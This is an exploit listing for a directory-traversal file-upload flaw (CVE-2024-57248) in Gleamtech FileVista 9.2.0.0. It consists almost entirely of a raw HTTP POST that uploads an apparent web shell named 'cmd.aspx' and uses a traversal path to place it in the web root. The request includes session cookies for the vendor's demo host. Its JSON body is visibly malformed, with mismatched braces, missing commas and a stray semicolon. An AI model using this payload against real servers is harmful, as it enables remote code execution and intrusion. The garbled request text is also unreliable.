Exploit for Gleamtech FileVista 9.2.0.0 Directory Traversal CVE-2024-57248

## https://sploitus.com/exploit?id=PACKETSTORM:189021
# Exploit Title: Gleamtech FileVista 9.2.0.0 - Directory Traversal Leading to Unrestricted File Upload
    # Date: Feb 6, 2025
    # Exploit Author: Suthiwat Thepsorn , Theerachai Chanwiroon , Pongtorn Angsuchotmetee , Manich Koomsusi
    # Vendor Homepage: https://www.gleamtech.com/
    # Software Link: https://demos.gleamtech.com/filevista/
    # Version: 9.2.0.0
    # Tested on: macOS
    # CVE : CVE-2024-57248
    
    POST /filevista/fileuploader.ashx/BeginQueue HTTP/2
    Host: demos.gleamtech.com
    Cookie: FileVista.RememberedUser=name=admin&language=en&hash=2003938397ace186d9585c247b0bd797; _ga=GA1.1.643446920.1730884542; _gl_au=
    1.1.1375949152.1730884542; ASP.NET_SessionId=ewpzf0u4awrnv2hdrybn0tlm; _ga_J4J0CRT2VQ=GS1.1.1731057655.10.1.1731064253.60.0.0
    Content-Length: 312
    Sec-Ch-Ua-Platform: "macOS"
    Accept-Language: en-US,en; q=0.9
    Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
    Sec-Ch-Ua-Mobile: ?0
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
    Accept: application/json
    Content-Type: application/json
    Origin: https://demos.gleamtech.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demos.gleamtech.com/filevista/
    Accept-Encoding: gzip, deflate, br
    Priority: u=1, i
    
    {"queueId": "17310642940180006686",
    "method": "Html5",
    "items": [
    "id":"17310642939920006685",
    "name": "cmd. aspx"
    "size": 2919,
    "dateModified":"2024-11-07T05:12:52.260Z"
    "customParameters":｛
    "fileManagerStateld": "f42imv"
    "fileManagerpath" ;"[1. Root Folder] :\\..\\..\\..\\....\\..\\..\\..\\filevistal\\"
    "stateId": "yc5khu"}